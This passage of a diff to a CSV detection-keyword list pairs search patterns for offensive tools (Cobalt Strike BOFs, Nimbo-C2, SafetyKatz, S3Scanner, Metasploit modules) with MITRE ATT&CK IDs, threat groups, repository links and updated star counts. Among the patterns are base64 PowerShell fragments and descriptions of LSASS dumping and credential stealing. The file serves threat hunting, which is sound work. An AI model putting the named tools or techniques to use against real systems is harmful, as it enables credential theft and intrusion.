and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*rvrsh3ll/BOF_Collection*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" -"*rvrsh3ll/TokenTactics*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*rvrsh3ll/BOF_Collection*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*rvrsh3ll/TokenTactics*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation 
Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" "*RwBlAHQALQBDAG8AbQBwAHUAdABlAHIASQBuAGYAbwAgAHwAIABzAGUAbABlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAVwBpAG4AZABvAHcAcwBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEkAUABBAGQAZAByAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAoACQAXwAgAC0AbABpAGsAZQAgACIAMQAwAC4AKgAuACoALgAqACIAKQAgAC0AbwByACAAKAAkAF8AIAAtAGwAaQBrAGUAIAAiADEAOQAyAC4AMQA2ADgALgAqAC4AKgAiACkAIAAtAG8AcgAgACgAJABfACAALQBsAGkAawBlACAAIgAxADcAMgAuADEANgA4AC4AKgAuACoAIgApAH0A*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*rwxfinder.*","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - 
TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","89","12","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" 
@@ -16092,37 +16274,37 @@
 "*rxwx/cs-rdll-ipc-example*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z"
 "*s0lst1c3*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/s0lst1c3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*s0md3v*","offensive_tool_keyword","Github Username","github username hosting offensive tools. mostly for web hacking","N/A","N/A","N/A","N/A","Web Attacks","https://github.com/s0md3v","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*s0md3v*Striker*","offensive_tool_keyword","Striker","Recon & Vulnerability Scanning Suite for web services","T1210.001 - T1190 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/s0md3v/Striker","1","1","N/A","N/A","10","2114","454","2023-06-04T20:15:11Z","2017-10-30T07:08:02Z"
+"*s0md3v*Striker*","offensive_tool_keyword","Striker","Recon & Vulnerability Scanning Suite for web services","T1210.001 - T1190 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/s0md3v/Striker","1","1","N/A","N/A","10","2116","454","2023-06-04T20:15:11Z","2017-10-30T07:08:02Z"
 "*S12cybersecurity/Admin2Sys*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z"
 "*S12cybersecurity/RDPCredentialStealer*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z"
 "*S3cretP4ssw0rd!*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z"
 "*S3cur3Th1sSh1t*","offensive_tool_keyword","Github Username","Github username of hackr known for exploitation scripts Pentesting. scripting and pwning!","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*S3cur3Th1sSh1t/MultiPotato*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z"
-"*S3cur3Th1sSh1t/PowerSharpPack*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
-"*s3scanner -*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
-"*s3scanner dump *","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
-"*s3scanner scan *","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
-"*S3Scanner-master*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
+"*S3cur3Th1sSh1t/PowerSharpPack*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*s3scanner -*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
+"*s3scanner dump *","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
+"*s3scanner scan *","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
+"*S3Scanner-master*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
 "*S4U2self.py*","offensive_tool_keyword","POC","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z"
 "*S4uDelegator.*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
-"*S4UTomato 1.0.0-beta*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
-"*S4UTomato.csproj*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
-"*S4UTomato.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
-"*S4UTomato.sln*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
-"*S4UTomato-master*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
+"*S4UTomato 1.0.0-beta*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
+"*S4UTomato.csproj*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
+"*S4UTomato.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
+"*S4UTomato.sln*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
+"*S4UTomato-master*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
 "*s7scan*","offensive_tool_keyword","Github Username","s7scan is a tool that scans networks. enumerates Siemens PLCs and gathers basic information about them. such as PLC firmware and hardwaare version. network configuration and security parameters. It is completely written on Python.","T1046 - T1018 - T1049 - T1040 - T1016 - T1057","TA0043 - TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/klsecservices/s7scan","1","1","N/A","N/A","2","121","45","2018-12-28T12:11:56Z","2018-10-12T08:52:04Z"
-"*sa7mon/S3Scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
-"*safari_in_operator_side_effect.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*safari_proxy_object_type_confusion.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*sa7mon/S3Scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
+"*safari_in_operator_side_effect.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*safari_proxy_object_type_confusion.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*SafeBreach-Labs/EDRaser*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z"
-"*safetydump*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*safetydump*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
 "*safetydump.ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
 "*safetydump.ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
 "*SafetyKatz.csproj*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z"
 "*SafetyKatz.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z"
 "*SafetyKatz.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
 "*SafetyKatz.exe*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z"
